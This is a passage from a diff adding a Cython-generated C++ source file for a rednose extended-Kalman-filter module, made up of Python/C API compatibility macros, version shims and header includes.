but leads to warnings with -pedantic, since it is a C++17 feature */ + #if ((defined(_MSVC_LANG) && _MSVC_LANG >= 201703L) || __cplusplus >= 201703L) + #if __has_cpp_attribute(fallthrough) + #define CYTHON_FALLTHROUGH [[fallthrough]] + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_cpp_attribute(clang::fallthrough) + #define CYTHON_FALLTHROUGH [[clang::fallthrough]] + #elif __has_cpp_attribute(gnu::fallthrough) + #define CYTHON_FALLTHROUGH [[gnu::fallthrough]] + #endif + #endif + #endif + #ifndef CYTHON_FALLTHROUGH + #if __has_attribute(fallthrough) + #define CYTHON_FALLTHROUGH __attribute__((fallthrough)) + #else + #define CYTHON_FALLTHROUGH + #endif + #endif + #if defined(__clang__) && defined(__apple_build_version__) + #if __apple_build_version__ < 7000000 + #undef CYTHON_FALLTHROUGH + #define CYTHON_FALLTHROUGH + #endif + #endif +#endif +#ifdef __cplusplus + template + struct __PYX_IS_UNSIGNED_IMPL {static const bool value = T(0) < T(-1);}; + #define __PYX_IS_UNSIGNED(type) (__PYX_IS_UNSIGNED_IMPL::value) +#else + #define __PYX_IS_UNSIGNED(type) (((type)-1) > 0) +#endif +#if CYTHON_COMPILING_IN_PYPY == 1 + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x030A0000) +#else + #define __PYX_NEED_TP_PRINT_SLOT (PY_VERSION_HEX >= 0x030800b4 && PY_VERSION_HEX < 0x03090000) +#endif +#define __PYX_REINTERPRET_FUNCION(func_pointer, other_pointer) ((func_pointer)(void(*)(void))(other_pointer)) + +#ifndef __cplusplus + #error "Cython files generated with the C++ option must be compiled with a C++ compiler." +#endif +#ifndef CYTHON_INLINE + #if defined(__clang__) + #define CYTHON_INLINE __inline__ __attribute__ ((__unused__)) + #else + #define CYTHON_INLINE inline + #endif +#endif +template +void __Pyx_call_destructor(T& x) { + x.~T(); +} +template +class __Pyx_FakeReference { + public: + __Pyx_FakeReference() : ptr(NULL) { } + __Pyx_FakeReference(const T& ref) : ptr(const_cast(&ref)) { } + T *operator->() { return ptr; } + T *operator&() { return ptr; } + operator T&() { return *ptr; } + template bool operator ==(const U& other) const { return *ptr == other; } + template bool operator !=(const U& other) const { return *ptr != other; } + template bool operator==(const __Pyx_FakeReference& other) const { return *ptr == *other.ptr; } + template bool operator!=(const __Pyx_FakeReference& other) const { return *ptr != *other.ptr; } + private: + T *ptr; +}; + +#define __PYX_BUILD_PY_SSIZE_T "n" +#define CYTHON_FORMAT_SSIZE_T "z" +#if PY_MAJOR_VERSION < 3 + #define __Pyx_BUILTIN_MODULE_NAME "__builtin__" + #define __Pyx_DefaultClassType PyClass_Type + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a+k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_BUILTIN_MODULE_NAME "builtins" + #define __Pyx_DefaultClassType PyType_Type +#if PY_VERSION_HEX >= 0x030B00A1 + static CYTHON_INLINE PyCodeObject* __Pyx_PyCode_New(int a, int p, int k, int l, int s, int f, + PyObject *code, PyObject *c, PyObject* n, PyObject *v, + PyObject *fv, PyObject *cell, PyObject* fn, + PyObject *name, int fline, PyObject *lnos) { + PyObject *kwds=NULL, *argcount=NULL, *posonlyargcount=NULL, *kwonlyargcount=NULL; + PyObject *nlocals=NULL, *stacksize=NULL, *flags=NULL, *replace=NULL, *empty=NULL; + const char *fn_cstr=NULL; + const char *name_cstr=NULL; + PyCodeObject *co=NULL, *result=NULL; + PyObject *type, *value, *traceback; + PyErr_Fetch(&type, &value, &traceback); + if (!(kwds=PyDict_New())) goto end; + if (!(argcount=PyLong_FromLong(a))) goto end; + if (PyDict_SetItemString(kwds, "co_argcount", argcount) != 0) goto end; + if (!(posonlyargcount=PyLong_FromLong(p))) goto end; + if (PyDict_SetItemString(kwds, "co_posonlyargcount", posonlyargcount) != 0) goto end; + if (!(kwonlyargcount=PyLong_FromLong(k))) goto end; + if (PyDict_SetItemString(kwds, "co_kwonlyargcount", kwonlyargcount) != 0) goto end; + if (!(nlocals=PyLong_FromLong(l))) goto end; + if (PyDict_SetItemString(kwds, "co_nlocals", nlocals) != 0) goto end; + if (!(stacksize=PyLong_FromLong(s))) goto end; + if (PyDict_SetItemString(kwds, "co_stacksize", stacksize) != 0) goto end; + if (!(flags=PyLong_FromLong(f))) goto end; + if (PyDict_SetItemString(kwds, "co_flags", flags) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_code", code) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_consts", c) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_names", n) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_varnames", v) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_freevars", fv) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_cellvars", cell) != 0) goto end; + if (PyDict_SetItemString(kwds, "co_linetable", lnos) != 0) goto end; + if (!(fn_cstr=PyUnicode_AsUTF8AndSize(fn, NULL))) goto end; + if (!(name_cstr=PyUnicode_AsUTF8AndSize(name, NULL))) goto end; + if (!(co = PyCode_NewEmpty(fn_cstr, name_cstr, fline))) goto end; + if (!(replace = PyObject_GetAttrString((PyObject*)co, "replace"))) goto end; + if (!(empty = PyTuple_New(0))) goto end; + result = (PyCodeObject*) PyObject_Call(replace, empty, kwds); + end: + Py_XDECREF((PyObject*) co); + Py_XDECREF(kwds); + Py_XDECREF(argcount); + Py_XDECREF(posonlyargcount); + Py_XDECREF(kwonlyargcount); + Py_XDECREF(nlocals); + Py_XDECREF(stacksize); + Py_XDECREF(replace); + Py_XDECREF(empty); + if (type) { + PyErr_Restore(type, value, traceback); + } + return result; + } +#elif PY_VERSION_HEX >= 0x030800B2 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_NewWithPosOnlyArgs(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#else + #define __Pyx_PyCode_New(a, p, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos)\ + PyCode_New(a, k, l, s, f, code, c, n, v, fv, cell, fn, name, fline, lnos) +#endif +#endif +#if PY_VERSION_HEX >= 0x030900A4 || defined(Py_IS_TYPE) + #define __Pyx_IS_TYPE(ob, type) Py_IS_TYPE(ob, type) +#else + #define __Pyx_IS_TYPE(ob, type) (((const PyObject*)ob)->ob_type == (type)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_Is) + #define __Pyx_Py_Is(x, y) Py_Is(x, y) +#else + #define __Pyx_Py_Is(x, y) ((x) == (y)) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsNone) + #define __Pyx_Py_IsNone(ob) Py_IsNone(ob) +#else + #define __Pyx_Py_IsNone(ob) __Pyx_Py_Is((ob), Py_None) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsTrue) + #define __Pyx_Py_IsTrue(ob) Py_IsTrue(ob) +#else + #define __Pyx_Py_IsTrue(ob) __Pyx_Py_Is((ob), Py_True) +#endif +#if PY_VERSION_HEX >= 0x030A00B1 || defined(Py_IsFalse) + #define __Pyx_Py_IsFalse(ob) Py_IsFalse(ob) +#else + #define __Pyx_Py_IsFalse(ob) __Pyx_Py_Is((ob), Py_False) +#endif +#define __Pyx_NoneAsNull(obj) (__Pyx_Py_IsNone(obj) ? NULL : (obj)) +#if PY_VERSION_HEX >= 0x030900F0 && !CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyObject_GC_IsFinalized(o) PyObject_GC_IsFinalized(o) +#else + #define __Pyx_PyObject_GC_IsFinalized(o) _PyGC_FINALIZED(o) +#endif +#ifndef CO_COROUTINE + #define CO_COROUTINE 0x80 +#endif +#ifndef CO_ASYNC_GENERATOR + #define CO_ASYNC_GENERATOR 0x200 +#endif +#ifndef Py_TPFLAGS_CHECKTYPES + #define Py_TPFLAGS_CHECKTYPES 0 +#endif +#ifndef Py_TPFLAGS_HAVE_INDEX + #define Py_TPFLAGS_HAVE_INDEX 0 +#endif +#ifndef Py_TPFLAGS_HAVE_NEWBUFFER + #define Py_TPFLAGS_HAVE_NEWBUFFER 0 +#endif +#ifndef Py_TPFLAGS_HAVE_FINALIZE + #define Py_TPFLAGS_HAVE_FINALIZE 0 +#endif +#ifndef Py_TPFLAGS_SEQUENCE + #define Py_TPFLAGS_SEQUENCE 0 +#endif +#ifndef Py_TPFLAGS_MAPPING + #define Py_TPFLAGS_MAPPING 0 +#endif +#ifndef METH_STACKLESS + #define METH_STACKLESS 0 +#endif +#if PY_VERSION_HEX <= 0x030700A3 || !defined(METH_FASTCALL) + #ifndef METH_FASTCALL + #define METH_FASTCALL 0x80 + #endif + typedef PyObject *(*__Pyx_PyCFunctionFast) (PyObject *self, PyObject *const *args, Py_ssize_t nargs); + typedef PyObject *(*__Pyx_PyCFunctionFastWithKeywords) (PyObject *self, PyObject *const *args, + Py_ssize_t nargs, PyObject *kwnames); +#else + #define __Pyx_PyCFunctionFast _PyCFunctionFast + #define __Pyx_PyCFunctionFastWithKeywords _PyCFunctionFastWithKeywords +#endif +#if CYTHON_METH_FASTCALL + #define __Pyx_METH_FASTCALL METH_FASTCALL + #define __Pyx_PyCFunction_FastCall __Pyx_PyCFunctionFast + #define __Pyx_PyCFunction_FastCallWithKeywords __Pyx_PyCFunctionFastWithKeywords +#else + #define __Pyx_METH_FASTCALL METH_VARARGS + #define __Pyx_PyCFunction_FastCall PyCFunction + #define __Pyx_PyCFunction_FastCallWithKeywords PyCFunctionWithKeywords +#endif +#if CYTHON_VECTORCALL + #define __pyx_vectorcallfunc vectorcallfunc + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET PY_VECTORCALL_ARGUMENTS_OFFSET + #define __Pyx_PyVectorcall_NARGS(n) PyVectorcall_NARGS((size_t)(n)) +#elif CYTHON_BACKPORT_VECTORCALL + typedef PyObject *(*__pyx_vectorcallfunc)(PyObject *callable, PyObject *const *args, + size_t nargsf, PyObject *kwnames); + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET ((size_t)1 << (8 * sizeof(size_t) - 1)) + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(((size_t)(n)) & ~__Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET)) +#else + #define __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET 0 + #define __Pyx_PyVectorcall_NARGS(n) ((Py_ssize_t)(n)) +#endif +#if PY_VERSION_HEX < 0x030900B1 + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) ((void)m, PyType_FromSpecWithBases(s, b)) + typedef PyObject *(*__Pyx_PyCMethod)(PyObject *, PyTypeObject *, PyObject *const *, size_t, PyObject *); +#else + #define __Pyx_PyType_FromModuleAndSpec(m, s, b) PyType_FromModuleAndSpec(m, s, b) + #define __Pyx_PyCMethod PyCMethod +#endif +#ifndef METH_METHOD + #define METH_METHOD 0x200 +#endif +#if CYTHON_COMPILING_IN_PYPY && !defined(PyObject_Malloc) + #define PyObject_Malloc(s) PyMem_Malloc(s) + #define PyObject_Free(p) PyMem_Free(p) + #define PyObject_Realloc(p) PyMem_Realloc(p) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) +#else + #define __Pyx_PyCode_HasFreeVars(co) (PyCode_GetNumFree(co) > 0) + #define __Pyx_PyFrame_SetLineNumber(frame, lineno) (frame)->f_lineno = (lineno) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyThreadState_Current PyThreadState_Get() +#elif !CYTHON_FAST_THREAD_STATE + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#elif PY_VERSION_HEX >= 0x03060000 + #define __Pyx_PyThreadState_Current _PyThreadState_UncheckedGet() +#elif PY_VERSION_HEX >= 0x03000000 + #define __Pyx_PyThreadState_Current PyThreadState_GET() +#else + #define __Pyx_PyThreadState_Current _PyThreadState_Current +#endif +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE void *__Pyx_PyModule_GetState(PyObject *op) +{ + void *result; + result = PyModule_GetState(op); + if (!result) + Py_FatalError("Couldn't find the module state"); + return result; +} +#endif +#define __Pyx_PyObject_GetSlot(obj, name, func_ctype) __Pyx_PyType_GetSlot(Py_TYPE(obj), name, func_ctype) +#if CYTHON_COMPILING_IN_LIMITED_API + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((func_ctype) PyType_GetSlot((type), Py_##name)) +#else + #define __Pyx_PyType_GetSlot(type, name, func_ctype) ((type)->name) +#endif +#if PY_VERSION_HEX < 0x030700A2 && !defined(PyThread_tss_create) && !defined(Py_tss_NEEDS_INIT) +#include "pythread.h" +#define Py_tss_NEEDS_INIT 0 +typedef int Py_tss_t; +static CYTHON_INLINE int PyThread_tss_create(Py_tss_t *key) { + *key = PyThread_create_key(); + return 0; +} +static CYTHON_INLINE Py_tss_t * PyThread_tss_alloc(void) { + Py_tss_t *key = (Py_tss_t *)PyObject_Malloc(sizeof(Py_tss_t)); + *key = Py_tss_NEEDS_INIT; + return key; +} +static CYTHON_INLINE void PyThread_tss_free(Py_tss_t *key) { + PyObject_Free(key); +} +static CYTHON_INLINE int PyThread_tss_is_created(Py_tss_t *key) { + return *key != Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE void PyThread_tss_delete(Py_tss_t *key) { + PyThread_delete_key(*key); + *key = Py_tss_NEEDS_INIT; +} +static CYTHON_INLINE int PyThread_tss_set(Py_tss_t *key, void *value) { + return PyThread_set_key_value(*key, value); +} +static CYTHON_INLINE void * PyThread_tss_get(Py_tss_t *key) { + return PyThread_get_key_value(*key); +} +#endif +#if PY_MAJOR_VERSION < 3 + #if CYTHON_COMPILING_IN_PYPY + #if PYPY_VERSION_NUM < 0x07030600 + #if defined(__cplusplus) && __cplusplus >= 201402L + [[deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")]] + #elif defined(__GNUC__) || defined(__clang__) + __attribute__ ((__deprecated__("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6"))) + #elif defined(_MSC_VER) + __declspec(deprecated("`with nogil:` inside a nogil function will not release the GIL in PyPy2 < 7.3.6")) + #endif + static CYTHON_INLINE int PyGILState_Check(void) { + return 0; + } + #else // PYPY_VERSION_NUM < 0x07030600 + #endif // PYPY_VERSION_NUM < 0x07030600 + #else + static CYTHON_INLINE int PyGILState_Check(void) { + PyThreadState * tstate = _PyThreadState_Current; + return tstate && (tstate == PyGILState_GetThisThreadState()); + } + #endif +#endif +#if CYTHON_COMPILING_IN_CPYTHON || defined(_PyDict_NewPresized) +#define __Pyx_PyDict_NewPresized(n) ((n <= 8) ? PyDict_New() : _PyDict_NewPresized(n)) +#else +#define __Pyx_PyDict_NewPresized(n) PyDict_New() +#endif +#if PY_MAJOR_VERSION >= 3 || CYTHON_FUTURE_DIVISION + #define __Pyx_PyNumber_Divide(x,y) PyNumber_TrueDivide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceTrueDivide(x,y) +#else + #define __Pyx_PyNumber_Divide(x,y) PyNumber_Divide(x,y) + #define __Pyx_PyNumber_InPlaceDivide(x,y) PyNumber_InPlaceDivide(x,y) +#endif +#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX > 0x030600B4 && CYTHON_USE_UNICODE_INTERNALS +#define __Pyx_PyDict_GetItemStrWithError(dict, name) _PyDict_GetItem_KnownHash(dict, name, ((PyASCIIObject *) name)->hash) +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStr(PyObject *dict, PyObject *name) { + PyObject *res = __Pyx_PyDict_GetItemStrWithError(dict, name); + if (res == NULL) PyErr_Clear(); + return res; +} +#elif PY_MAJOR_VERSION >= 3 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07020000) +#define __Pyx_PyDict_GetItemStrWithError PyDict_GetItemWithError +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#else +static CYTHON_INLINE PyObject * __Pyx_PyDict_GetItemStrWithError(PyObject *dict, PyObject *name) { +#if CYTHON_COMPILING_IN_PYPY + return PyDict_GetItem(dict, name); +#else + PyDictEntry *ep; + PyDictObject *mp = (PyDictObject*) dict; + long hash = ((PyStringObject *) name)->ob_shash; + assert(hash != -1); + ep = (mp->ma_lookup)(mp, name, hash); + if (ep == NULL) { + return NULL; + } + return ep->me_value; +#endif +} +#define __Pyx_PyDict_GetItemStr PyDict_GetItem +#endif +#if CYTHON_USE_TYPE_SLOTS + #define __Pyx_PyType_GetFlags(tp) (((PyTypeObject *)tp)->tp_flags) + #define __Pyx_PyType_HasFeature(type, feature) ((__Pyx_PyType_GetFlags(type) & (feature)) != 0) + #define __Pyx_PyObject_GetIterNextFunc(obj) (Py_TYPE(obj)->tp_iternext) +#else + #define __Pyx_PyType_GetFlags(tp) (PyType_GetFlags((PyTypeObject *)tp)) + #define __Pyx_PyType_HasFeature(type, feature) PyType_HasFeature(type, feature) + #define __Pyx_PyObject_GetIterNextFunc(obj) PyIter_Next +#endif +#if CYTHON_USE_TYPE_SPECS && PY_VERSION_HEX >= 0x03080000 +#define __Pyx_PyHeapTypeObject_GC_Del(obj) {\ + PyTypeObject *type = Py_TYPE(obj);\ + assert(__Pyx_PyType_HasFeature(type, Py_TPFLAGS_HEAPTYPE));\ + PyObject_GC_Del(obj);\ + Py_DECREF(type);\ +} +#else +#define __Pyx_PyHeapTypeObject_GC_Del(obj) PyObject_GC_Del(obj) +#endif +#if CYTHON_COMPILING_IN_LIMITED_API + #define CYTHON_PEP393_ENABLED 1 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GetLength(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_ReadChar(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((void)u, 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((void)u, (0)) + #define __Pyx_PyUnicode_DATA(u) ((void*)u) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)k, PyUnicode_ReadChar((PyObject*)(d), i)) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GetLength(u)) +#elif PY_VERSION_HEX > 0x03030000 && defined(PyUnicode_KIND) + #define CYTHON_PEP393_ENABLED 1 + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_READY(op) (0) + #else + #define __Pyx_PyUnicode_READY(op) (likely(PyUnicode_IS_READY(op)) ?\ + 0 : _PyUnicode_Ready((PyObject *)(op))) + #endif + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_LENGTH(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) PyUnicode_READ_CHAR(u, i) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) PyUnicode_MAX_CHAR_VALUE(u) + #define __Pyx_PyUnicode_KIND(u) ((int)PyUnicode_KIND(u)) + #define __Pyx_PyUnicode_DATA(u) PyUnicode_DATA(u) + #define __Pyx_PyUnicode_READ(k, d, i) PyUnicode_READ(k, d, i) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) PyUnicode_WRITE(k, d, i, (Py_UCS4) ch) + #if PY_VERSION_HEX >= 0x030C0000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_LENGTH(u)) + #else + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03090000 + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : ((PyCompactUnicodeObject *)(u))->wstr_length)) + #else + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != (likely(PyUnicode_IS_READY(u)) ? PyUnicode_GET_LENGTH(u) : PyUnicode_GET_SIZE(u))) + #endif + #endif +#else + #define CYTHON_PEP393_ENABLED 0 + #define PyUnicode_1BYTE_KIND 1 + #define PyUnicode_2BYTE_KIND 2 + #define PyUnicode_4BYTE_KIND 4 + #define __Pyx_PyUnicode_READY(op) (0) + #define __Pyx_PyUnicode_GET_LENGTH(u) PyUnicode_GET_SIZE(u) + #define __Pyx_PyUnicode_READ_CHAR(u, i) ((Py_UCS4)(PyUnicode_AS_UNICODE(u)[i])) + #define __Pyx_PyUnicode_MAX_CHAR_VALUE(u) ((sizeof(Py_UNICODE) == 2) ? 65535U : 1114111U) + #define __Pyx_PyUnicode_KIND(u) ((int)sizeof(Py_UNICODE)) + #define __Pyx_PyUnicode_DATA(u) ((void*)PyUnicode_AS_UNICODE(u)) + #define __Pyx_PyUnicode_READ(k, d, i) ((void)(k), (Py_UCS4)(((Py_UNICODE*)d)[i])) + #define __Pyx_PyUnicode_WRITE(k, d, i, ch) (((void)(k)), ((Py_UNICODE*)d)[i] = (Py_UNICODE) ch) + #define __Pyx_PyUnicode_IS_TRUE(u) (0 != PyUnicode_GET_SIZE(u)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #define __Pyx_PyUnicode_Concat(a, b) PyNumber_Add(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) PyNumber_Add(a, b) +#else + #define __Pyx_PyUnicode_Concat(a, b) PyUnicode_Concat(a, b) + #define __Pyx_PyUnicode_ConcatSafe(a, b) ((unlikely((a) == Py_None) || unlikely((b) == Py_None)) ?\ + PyNumber_Add(a, b) : __Pyx_PyUnicode_Concat(a, b)) +#endif +#if CYTHON_COMPILING_IN_PYPY + #if !defined(PyUnicode_DecodeUnicodeEscape) + #define PyUnicode_DecodeUnicodeEscape(s, size, errors) PyUnicode_Decode(s, size, "unicode_escape", errors) + #endif + #if !defined(PyUnicode_Contains) || (PY_MAJOR_VERSION == 2 && PYPY_VERSION_NUM < 0x07030500) + #undef PyUnicode_Contains + #define PyUnicode_Contains(u, s) PySequence_Contains(u, s) + #endif + #if !defined(PyByteArray_Check) + #define PyByteArray_Check(obj) PyObject_TypeCheck(obj, &PyByteArray_Type) + #endif + #if !defined(PyObject_Format) + #define PyObject_Format(obj, fmt) PyObject_CallMethod(obj, "__format__", "O", fmt) + #endif +#endif +#define __Pyx_PyString_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyString_Check(b) && !PyString_CheckExact(b)))) ? PyNumber_Remainder(a, b) : __Pyx_PyString_Format(a, b)) +#define __Pyx_PyUnicode_FormatSafe(a, b) ((unlikely((a) == Py_None || (PyUnicode_Check(b) && !PyUnicode_CheckExact(b)))) ? PyNumber_Remainder(a, b) : PyUnicode_Format(a, b)) +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyString_Format(a, b) PyUnicode_Format(a, b) +#else + #define __Pyx_PyString_Format(a, b) PyString_Format(a, b) +#endif +#if PY_MAJOR_VERSION < 3 && !defined(PyObject_ASCII) + #define PyObject_ASCII(o) PyObject_Repr(o) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBaseString_Type PyUnicode_Type + #define PyStringObject PyUnicodeObject + #define PyString_Type PyUnicode_Type + #define PyString_Check PyUnicode_Check + #define PyString_CheckExact PyUnicode_CheckExact +#ifndef PyObject_Unicode + #define PyObject_Unicode PyObject_Str +#endif +#endif +#if PY_MAJOR_VERSION >= 3 + #define __Pyx_PyBaseString_Check(obj) PyUnicode_Check(obj) + #define __Pyx_PyBaseString_CheckExact(obj) PyUnicode_CheckExact(obj) +#else + #define __Pyx_PyBaseString_Check(obj) (PyString_Check(obj) || PyUnicode_Check(obj)) + #define __Pyx_PyBaseString_CheckExact(obj) (PyString_CheckExact(obj) || PyUnicode_CheckExact(obj)) +#endif +#if CYTHON_COMPILING_IN_CPYTHON + #define __Pyx_PySequence_ListKeepNew(obj)\ + (likely(PyList_CheckExact(obj) && Py_REFCNT(obj) == 1) ? __Pyx_NewRef(obj) : PySequence_List(obj)) +#else + #define __Pyx_PySequence_ListKeepNew(obj) PySequence_List(obj) +#endif +#ifndef PySet_CheckExact + #define PySet_CheckExact(obj) __Pyx_IS_TYPE(obj, &PySet_Type) +#endif +#if PY_VERSION_HEX >= 0x030900A4 + #define __Pyx_SET_REFCNT(obj, refcnt) Py_SET_REFCNT(obj, refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) +#else + #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) +#endif +#if CYTHON_ASSUME_SAFE_MACROS + #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) +#else + #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyIntObject PyLongObject + #define PyInt_Type PyLong_Type + #define PyInt_Check(op) PyLong_Check(op) + #define PyInt_CheckExact(op) PyLong_CheckExact(op) + #define __Pyx_Py3Int_Check(op) PyLong_Check(op) + #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) + #define PyInt_FromString PyLong_FromString + #define PyInt_FromUnicode PyLong_FromUnicode + #define PyInt_FromLong PyLong_FromLong + #define PyInt_FromSize_t PyLong_FromSize_t + #define PyInt_FromSsize_t PyLong_FromSsize_t + #define PyInt_AsLong PyLong_AsLong + #define PyInt_AS_LONG PyLong_AS_LONG + #define PyInt_AsSsize_t PyLong_AsSsize_t + #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask + #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask + #define PyNumber_Int PyNumber_Long +#else + #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) + #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBoolObject PyLongObject +#endif +#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY + #ifndef PyUnicode_InternFromString + #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) + #endif +#endif +#if PY_VERSION_HEX < 0x030200A4 + typedef long Py_hash_t; + #define __Pyx_PyInt_FromHash_t PyInt_FromLong + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t +#else + #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t +#endif +#if CYTHON_USE_ASYNC_SLOTS + #if PY_VERSION_HEX >= 0x030500B1 + #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods + #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) + #else + #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) + #endif +#else + #define __Pyx_PyType_AsAsync(obj) NULL +#endif +#ifndef __Pyx_PyAsyncMethodsStruct + typedef struct { + unaryfunc am_await; + unaryfunc am_aiter; + unaryfunc am_anext; + } __Pyx_PyAsyncMethodsStruct; +#endif + +#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) + #if !defined(_USE_MATH_DEFINES) + #define _USE_MATH_DEFINES + #endif +#endif +#include +#ifdef NAN +#define __PYX_NAN() ((float) NAN) +#else +static CYTHON_INLINE float __PYX_NAN() { + float value; + memset(&value, 0xFF, sizeof(value)); + return value; +} +#endif +#if defined(__CYGWIN__) && defined(_LDBL_EQ_DBL) +#define __Pyx_truncl trunc +#else +#define __Pyx_truncl truncl +#endif + +#define __PYX_MARK_ERR_POS(f_index, lineno) \ + { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } +#define __PYX_ERR(f_index, lineno, Ln_error) \ + { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } + +#ifdef CYTHON_EXTERN_C + #undef __PYX_EXTERN_C + #define __PYX_EXTERN_C CYTHON_EXTERN_C +#elif defined(__PYX_EXTERN_C) + #ifdef _MSC_VER + #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") + #else + #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. + #endif +#else + #define __PYX_EXTERN_C extern "C++" +#endif + +#define __PYX_HAVE__rednose__helpers__ekf_sym_pyx +#define __PYX_HAVE_API__rednose__helpers__ekf_sym_pyx +/* Early includes */ +#include +#include +#include "ios" +#include "new" +#include "stdexcept" +#include "typeinfo" +#include +#include + + /* Using NumPy API declarations from "numpy/__init__.cython-30.pxd" */ + +#include "numpy/arrayobject.h" +#include "numpy/ndarrayobject.h" +#include "numpy/ndarraytypes.h" +#include "numpy/arrayscalars.h" +#include "numpy/ufuncobject.h" +#include +#include "rednose/helpers/ekf_sym.h" +#include "pythread.h" +#include +#ifdef _OPENMP +#include +#endif /* _OPENMP */ + +#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) +#define CYTHON_WITHOUT_ASSERTIONS +#endif + +typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; + const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; + +#define __PYX_DEFAULT_STRING_ENCODING_IS_ASCII 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 +#define 